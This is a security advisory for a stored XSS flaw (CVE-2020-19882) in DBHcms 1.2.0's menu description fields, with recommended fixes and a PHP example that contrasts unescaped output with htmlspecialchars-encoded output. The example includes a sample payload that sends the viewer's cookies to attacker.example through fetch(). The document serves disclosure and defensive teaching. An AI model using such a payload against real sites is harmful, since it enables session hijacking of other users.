PT-2020-15208 · Dbhcms · Dbhcms

Published: 2020-08-24 · Updated: 2020-08-25 · CVE-2020-19882

CVSS v3.1: 4.8 (Medium)
Vector: AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions: DBHcms version 1.2.0

Description: DBHcms 1.2.0 contains a stored cross-site scripting (XSS) vulnerability. The menu description value is written into the page without being passed through htmlspecialchars in two files: dbhcms/mod/mod.menus.edit.php (line 83) and dbhcms/mod/mod.menus.view.php (line 111). A remote, authenticated attacker with admin privileges can save a JavaScript payload as a menu description; it then executes in the browser of any user who opens the affected pages, which can be used to hijack those users' sessions.

Recommendations: For DBHcms 1.2.0, apply htmlspecialchars (with ENT_QUOTES and the page's character set) to the menu description at the point of output in both affected files. As a temporary workaround, restrict access to the menu edit and view functions until a proper fix is applied. Setting the HttpOnly flag on the session cookie limits the session-hijacking impact of a stored script but does not remove the XSS itself.
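The pattern the advisory describes, as an added illustration that is not DBHcms code: a menu description saved by an admin and rendered back into the edit form and the view page, first unescaped and then passed through htmlspecialchars. The function names, the field name, the attribute context and the sample payload are assumptions constructed for this example; only the missing-htmlspecialchars pattern comes from the advisory.

```php
<?php
// Added example, not DBHcms code: it mirrors the missing-htmlspecialchars
// pattern from the advisory. Function names, field name and payload are
// assumptions made for the illustration.

// Constructed sample payload: what a malicious admin could save as a menu
// description. It closes the value="..." attribute and adds an event handler
// that sends the viewing user's cookies to an attacker-controlled host.
$menu_description = 'Main menu" autofocus onfocus="fetch(\'https://attacker.example/?c=\'+document.cookie)" x="';

// Vulnerable pattern: the stored value is concatenated straight into markup,
// so the browser parses the payload as real attributes and script.
function render_menu_edit_vulnerable(string $description): string
{
    return '<input type="text" name="menu_description" value="' . $description . '">';
}

// Output-encoding helper. ENT_QUOTES encodes both " and ' (the default flags
// leave ' alone, which matters inside single-quoted attributes),
// ENT_SUBSTITUTE keeps invalid UTF-8 from collapsing the output to an empty
// string, and the charset is stated explicitly rather than inherited.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Fixed edit form (attribute context) and view page (text context). Encode at
// the point of output, not on the way into the database, so the stored value
// stays intact and every rendering path is covered.
function render_menu_edit_fixed(string $description): string
{
    return '<input type="text" name="menu_description" value="' . e($description) . '">';
}

function render_menu_view_fixed(string $description): string
{
    return '<td>' . e($description) . '</td>';
}

// Regression check: after encoding, none of the characters that can terminate
// an attribute or open a tag may survive in the embedded value.
function is_safely_encoded(string $encoded): bool
{
    return preg_match('/[<>"\']/', $encoded) === 0;
}

echo "Vulnerable edit form:\n" . render_menu_edit_vulnerable($menu_description) . "\n\n";
echo "Fixed edit form:\n" . render_menu_edit_fixed($menu_description) . "\n\n";
echo "Fixed view page:\n" . render_menu_view_fixed($menu_description) . "\n\n";
echo "Encoded value free of breakout characters: "
    . (is_safely_encoded(e($menu_description)) ? 'yes' : 'no') . "\n";
```

Run it with `php example.php`. In the vulnerable output the payload's `onfocus` appears as a genuine attribute of the input element; in the fixed output the same bytes are inert text inside the `value` attribute, and the `is_safely_encoded` check confirms no quote or angle bracket survived encoding. The same helper covers both files named in the advisory because the fix is a property of the output path, not of the stored data.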

Tags: XSS

Related Identifiers: CVE-2020-19882

Affected Products: Dbhcms